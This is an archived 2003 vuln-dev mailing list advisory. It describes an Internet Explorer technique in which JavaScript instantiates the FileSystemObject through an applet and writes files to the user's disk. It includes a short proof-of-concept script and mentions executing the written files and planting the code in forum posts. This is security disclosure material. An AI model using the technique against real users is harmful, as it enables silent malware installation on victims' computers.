Internet Explorer JavaScript insecure function
From: FREEBRAIN (freebrain_at_unionnewbies.net)
Date: 12/07/03
- Previous message: Jeff Moss: "Black Hat Briefings Amsterdam Call for Papers"
- Next in thread: Scovetta, Michael V: "RE: Internet Explorer JavaScript insecure function"
- Maybe reply: Scovetta, Michael V: "RE: Internet Explorer JavaScript insecure function"
- Reply: npguy: "Re: Internet Explorer JavaScript insecure function"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: vuln-dev@securityfocus.com Date: Sun, 07 Dec 2003 15:56:57 +0100
* Internet Explorer JavaScript insecure function *
Product: Microsoft Internet Explorer
Version: 5.x (probabily other versions may be affected)
***
Problem:
I discovered a javascript function (interpreted by Internet Explorer) called
"file.writeline()" may be
potentially dangerous for Internet Explorer users. This function allows to
write files by means of
JavaScript on a hard disk.
An attacker may use this function writting JavaScript code in posts of
forums, guestbooks, etc for owning
his victim's computers. With "file.writeline()" function the attacker can
write trojans/virus/etc on his
victim's hard disks, for example, an attacker may use JavaScript
"file.writeline()" function for writting
a malicious file in VBS (Visual Basic Scripting) language.
I repeat, this may be potentially dangerous for Internet Explorer users.
NOTE: Actually a virus in the wild that affects to mIRC users is using this
function ("file.writeline").
NOTE2: As you can see on the "Proof of concept", other functions are needed
to carry out an "intrusion".
***
Proof of concept:
InterfaceObject=document.applets[0];
setTimeout("Write()",1000);
function Write() {
fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}";
InterfaceObject.setCLSID(fsoClassID);
fso = InterfaceObject.createInstance();
// windir = fso.getspecialfolder ;
filename = "\\proof.txt";
var filecontent = "Hello world";
file = fso.opentextfile(filename, "2", "TRUE");
file.writeline(filecontent)
file.close();
}
This code writes a file called "proof.txt" in the hard disk, with the
content "Hello world". Also you can
execute files you write by means of JavaScript adding "Run();" to the
function.
***
Solution:
I'm not sure about the solution but I recommend to upgrade to the last
version of Internet Explorer.
Also I recommend webmasters to forbid HTML codes that content this function
in their forums, guestbooks, etc.
***
Thanks to:
#disidents,#hackers,#hacker @ irc-phoenix.org
#disidents,#sleepx,#ayuda_internet @ irc-hispano.org
Special thanks go to: Impos, |_Tr0mP4s
(sorry my poor english)
***
By FREEBRAIN
FREEBRAIN is a member of DisidentS Hacker Team
http://disidents-team.cjb.net (under construction) -
http://www.gratisweb.com/disidents
<freebrain@unionnewbies.net> ( www.unionnewbies.net )
- Previous message: Jeff Moss: "Black Hat Briefings Amsterdam Call for Papers"
- Next in thread: Scovetta, Michael V: "RE: Internet Explorer JavaScript insecure function"
- Maybe reply: Scovetta, Michael V: "RE: Internet Explorer JavaScript insecure function"
- Reply: npguy: "Re: Internet Explorer JavaScript insecure function"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
